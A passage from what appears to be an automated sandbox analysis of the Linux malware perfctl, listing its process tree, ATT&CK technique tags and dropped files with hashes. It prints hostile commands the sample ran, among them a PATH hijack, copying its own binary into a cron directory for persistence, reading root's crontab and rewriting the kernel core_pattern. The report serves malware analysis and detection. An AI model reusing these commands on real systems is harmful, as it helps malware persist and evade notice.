                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                                who
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3770
                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                                  wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3771
                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                  /bin/sh -c "PATH=/tmp/.perf.c:\$PATH;export AAPCRK=c1cH3IVckE39;nohup perfctl >/dev/null 2>/dev/null & exit"
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3772
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/nohup
                                                                                                                                                                                                                                                                                                                                                                                                                                    nohup perfctl
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3773
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                    /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3780
                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                                      who
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3781
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                                        wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3782
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                        /bin/sh -c "cp /proc/2500/exe /root/.config/cron/perfcc && chmod +x /root/.config/cron/perfcc"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3783
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/cp
                                                                                                                                                                                                                                                                                                                                                                                                                                          cp /proc/2500/exe /root/.config/cron/perfcc
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3784
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/chmod
                                                                                                                                                                                                                                                                                                                                                                                                                                            chmod +x /root/.config/cron/perfcc
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies special file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3785
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                          /bin/sh -c "find /var/spool/cron/crontabs -type f 2>/dev/null|grep cron|grep '/root\$'|xargs cat"
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3786
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/find
                                                                                                                                                                                                                                                                                                                                                                                                                                            find /var/spool/cron/crontabs -type f
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3787
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                              grep cron
                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3788
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                grep "/root\$"
                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3789
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                  xargs cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3790
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /tmp/.perf.c/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                      cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3791
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /tmp/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                        cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3791
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/local/sbin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                          cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3791
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/local/bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                            cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3791
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/sbin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                              cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3791
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                cat /var/spool/cron/crontabs/root
                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3791
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "echo '/etc/coredumps/%e.%p.%u.%t' > /proc/sys/kernel/core_pattern"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3792
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                                                              /bin/sh -c "who | wc -l"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: Unix Shell
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3793
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/who
                                                                                                                                                                                                                                                                                                                                                                                                                                                                who
                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3794
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/wc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3795
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.perf.c/perfctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                perfctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks hardware identifiers (DMI)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Reads hardware information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks CPU configuration
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Enumerates kernel/hardware configuration
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Writes file to tmp directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3773

                                                                                                                                                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /etc/cron.daily/perfclean

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                17B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6b1a793f9ba2e9592272a5b34929ad25

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                f91e27462ee3e809b5972e093155c29755594aca

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                5d84e63927fda2949bbf96f2e8a4797233a20e1bb30943594cb29ac60136131c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                5a2798cb1895d1c8fcac0a6dcf1b95132ddbf007e28512766d706e22ab53f8f554737fdef679dd1852e319e71fac3ac06fc1d436b58bce0a32cd90b7caf0758a

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /etc/selinux/sedpOZdAO

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                582B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                eead65ce52555282382e27bc87297fb4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                031576d11f04a8e88d16afb1d249b7944b2037fb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                df6b8d0466873294f01b0b1b457615beb9ab041acd21e80f9e75a955f9111bcf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3e0356d717c9a80261d757367e4afd2bbdd91373bf670292199be27b822910db4c94a5c2d561f770beaf7de7acd4924ff39875608a06926fb20de40f1c556877

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /etc/systemd/system/kmodaudit.service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                279B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                8b2da5f899812804b5545d186941fd0e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                addbaf2140b433934b75a0f58bd4ced35d8a2b4f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                9d113848aafa9670100d9973963de30b1cc56f3ec465318d29c80b09384fdd70

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                ab99a3a9a8f1def55d16fd16a565c97d23334c7b2dad91cd7f62bc5b11b75f47e0b233311fcf54f444d8bfb75a8a453b68b3640c69ee66e66e6241bb0b7c05d2

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /root/.config/cron/perfcc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                8.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                656e22c65bf7c04d87b5afbe52b8d800

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                0fd199053171fec86be186106eac717c4edae2ad

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                697954f75e391a6cc600b7d40509ac1a1515cb0a4234cc3ae4270beaf7bbc3a3da23a9cd4f25e0eb4f5956d24ca3866e2574dc9493644845aac1063e1e4b0183

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /root/sedw5OZjn

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                214B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                57ce0c5287f51b23cc30113afa646e4c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                440ee6e8c026795936ac91c1e2584a381963b0b6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3b7327e5d64644c87ecba78f1b665379700968b8a68628470fc0afee1e8a85d2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                86b00207940b35d8eb6c07493ae9b582b183374634808a6582b94c196c95e9f59a154a3d235c2b78a3c3c0f51342cc32601093723b9420d5cdb436398d89cf0a

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.apid

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                4B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                73f104c9fba50050eea11d9d075247cc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                4b51fbf06972de1dc64623085d8d09cb76758a18

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                45d823d25b097fa8b7dfd0abaf70c0dcd896ded3720f4e1d3196f6c39308cd8d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                5902e92d758081d374db4c2df607ffa95f637c9fb56f9c126fdb6b68ff9b757a00e4ace4e456e007cd3cdf45a9b8efd70ca02f0d3475fc6a0ef23cdd21736242

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.perf.c/perfctl

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6e7230dbe35df5b46dcd08975a0cc87f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3de0a2f76f95375c1c078a465683415bda99f01b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                e16fb2a22fce5241565784b5a8518ed2becc9948d4c398093edbb70a946f9331

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                df5c9caaebec5adbc291f11b27a003602e6e01a25634c920e4cc4cc1f204845849f9967357a9f2a53b5799ce460ceeea04a3f04e03256fc46668becaa801dd5d

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/cp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                36B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3ec636b2bf412c3c5727d51d3233622e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6999eef6717eb9e4bd148e90fbd5cce396160142

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                4d9dde36705f10afcca9ea4eb3e925603f5ecbc997d1bdcfc82313fdfb01bbb5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                7973f4598778cb295d1871233f202031e4d415271b317719abdb769e20fa660ccb06e33e08e0d92d0aa12434a2cc00f08a29a428060df609eb2d0cbba345fd7d

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/cty

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                7caa701b2bd5a182b80c72b9bdf88e2d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                24a1733ca8bb0ae45a3ffd1eeddc926b2fc5841f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                d15690f08a575024650b01ffac892cfd2b93e6c57c140f1b6d9e47753cabd579

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                ef460e752178cb4db5b2caec975120f1bb99a31cb51c2c12c47c8c8529e18abc37efc0132ff63388baedab91051aa3f93363bd0752e292da054001e0cae3d0bb

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/elog

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                105B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                e31f36eeef3ff930b8cd96d50101322e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                c073ffab816bc97e6ff0185befe9b11b2f0451d1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                7980732730c7e118c2d53ef43ad1245b12ac07f677157dc4eb43af1f2480864d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                74497e9efd3575421040558a20aaf3706d0202ee53610388ae2c6acb90647dd90120fde3126f5ca52ba98653a6a61e7c88dcbadaa3ab5496f5a527c30deb9b31

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/exi

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                13B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                17bcf11dc5f1fa6c48a1a856a72f1119

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                873ec0cbd312762df3510b8cccf260dc0a23d709

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                a7bf504871a46343c2feab9d923e01b9dca4e980b2e122ad55fd4dbb3f6c16d9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                9c12db4c6a105e767ff27048d2f8f19de5c9721ce6503dbb497aedcc1fc8b910a6fa43ec987fecd26794aff7440cb984744698fec5741dd73400a299dc3b2a25

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/hroot/hscheck

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                7B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1119efd67e02c8cd879f82ac09fc4b0d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6c6f10c80f975edf95a23a42c47ce43fdd45432d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                621bd1efc8ba6575c1bdb629b261d8ab6bff5182b564e5cb941956514f8ad865

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                f1bde4ec683b5a8a0f86fc9f26ebb3cb7fdc0ddaf4e467712ec0db0cf71af4330d44490a9bf30cc8b30ca7ce47f0fc6b770c0ca6a4ad12f833160712c46913fa

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/hs.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                67B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                11bc860262379c820277e89f5f115ad2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                120a368751a2f3c586bac412c34a9d6c6e139dec

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                59faaf4389ad6272b292207687c8e7f828785f8aaa5ca3749edbca29b42403b7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                c2062504de914a75085d09d4206a588c5861ed3d533101b19a6a026c475a6b8cb40c41fe9c05a942ef2827a8d978b12b81c56b76d2e39c48df5ace52e4b273cb

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/p

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                4B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                f7696a9b362ac5a51c3dc8f098b73923

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                a6a0845258a40575703021e5244ff9c70838a23b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                5a0b83e19c5750eed6d8d46cb858d15c956a657093c08afa53133c0fbe5f04fb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3ae0f24c4f1fe6593f20f92f251c54c1d10e6f576340c9ae31a46d50cf3b49c364d1a0ab6b9d5702cb057077db52a48f192b491f142315311629b9ad7cc11fdb

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/tordata/control_auth_cookie.tmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                32B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                84e5f2135889260d7f5c8e15c3833bf5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                e23181bd2b1ed4add8d183d44555355dd94b5e0b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                607aebf2a6f16d3b4dde744f77c5789ee922ed4c16965e3f49d5fa842676f120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                db15b30ed57c94ec22e593bf3c7a14695885c02467f9818a18fe882f7118efca40f9ded9bdb4036fe74d2d48033ffec1036798ad8ef10fee9237b92ca2276455

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/tordata/ts

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                10B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                ee31f3a6daad9a2626317856e406f462

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                da7a039f1537a26a04f85b198eadff689395e56c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                48525e22ab114839ebc3989a79d4f5ebafc15db0e7a2f9c7287c006fdc460f66

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                b92e2f8063f1a044290e3767899d029cf9a96fbb9867190d7496c9b3d34eff08433c41ceefaa6ca8ff1f39229c3a51bfa687676996f85558834ef78cb01d8ff3

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/uid

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                cfcd208495d565ef66e7dff9f98764da

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/.xdiag/ver

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                18B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                be3f0172f141ac769936cabe8c54ad72

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                ab60ce77a0c866d2d1919f6ea01120ef0297f0b2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3de4841e5a18d29d8549d60f098e7663254574efb790e659458341d9a967d506

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                9ab39cd5451ba0d87c11f37a6188ad4123ec167f89a4f7ddb9592acfebf24e67917f91f66f54feff5d54bbb37fe8427400871fd2b22dd009be6fa561accca90e

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/lgctr

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                3bfa4893eae24372d4d0a0b18f5a9c79

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                76eb0972b964ad4279cd33aaf5e24e35b4313941

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                f9e7d7c790387ff7b879c56d25b5a9c414cb2b1533aca940874caf0ff80e7f0e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                414a72f674a9431e54188ace8f71002867a3962cdb5039bd05eae808d39d6ddfb4204ee1f3111761fa627a77072040bccd2cbf959926e636a9e200a2b3a2afb4

                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /tmp/lgctr2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                33B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                012e94c2ac42ddfb14d760d894fee27c

